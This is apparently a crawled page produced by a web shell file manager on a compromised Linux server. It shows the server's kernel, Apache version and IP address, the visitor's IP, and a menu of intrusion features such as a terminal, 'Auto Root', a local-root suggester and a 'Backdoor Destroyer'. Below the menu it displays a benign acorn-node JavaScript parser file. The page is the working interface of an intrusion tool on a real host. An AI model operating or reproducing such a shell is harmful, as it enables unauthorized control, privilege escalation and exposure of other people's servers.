Linux v69820.1blu.de 4.15.0 #1 SMP Mon Sep 30 15:36:27 MSK 2024 x86_64
Apache/2.4.58
Server IP : 195.90.215.149 & Your IP : 216.73.217.80
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
nodejs /
acorn-node /
lib /
export-ns-from /
Delete
Unzip
Name
Size
Permission
Date
Action
index.js
1.29
KB
-rw-r--r--
2022-11-10 05:48
Save
Rename
/* Generated by `npm run build`, do not edit! */ "use strict" var skipWhiteSpace = /(?:\s|\/\/.*|\/\*[^]*?\*\/)*/g module.exports = function(Parser) { var tt = (Parser.acorn || require("acorn")).tokTypes return /*@__PURE__*/(function (Parser) { function anonymous () { Parser.apply(this, arguments); } if ( Parser ) anonymous.__proto__ = Parser; anonymous.prototype = Object.create( Parser && Parser.prototype ); anonymous.prototype.constructor = anonymous; anonymous.prototype.parseExport = function parseExport (node, exports) { skipWhiteSpace.lastIndex = this.pos var skip = skipWhiteSpace.exec(this.input) var next = this.input.charAt(this.pos + skip[0].length) if (next !== "*") { return Parser.prototype.parseExport.call(this, node, exports) } this.next() this.expect(tt.star) if (this.eatContextual("as")) { node.exported = this.parseIdent(true) this.checkExport(exports, node.exported.name, node.exported.start) } else { node.exported = null } this.expectContextual("from") if (this.type !== tt.string) { this.unexpected() } node.source = this.parseExprAtom() this.semicolon() return this.finishNode(node, "ExportAllDeclaration") }; return anonymous; }(Parser)) }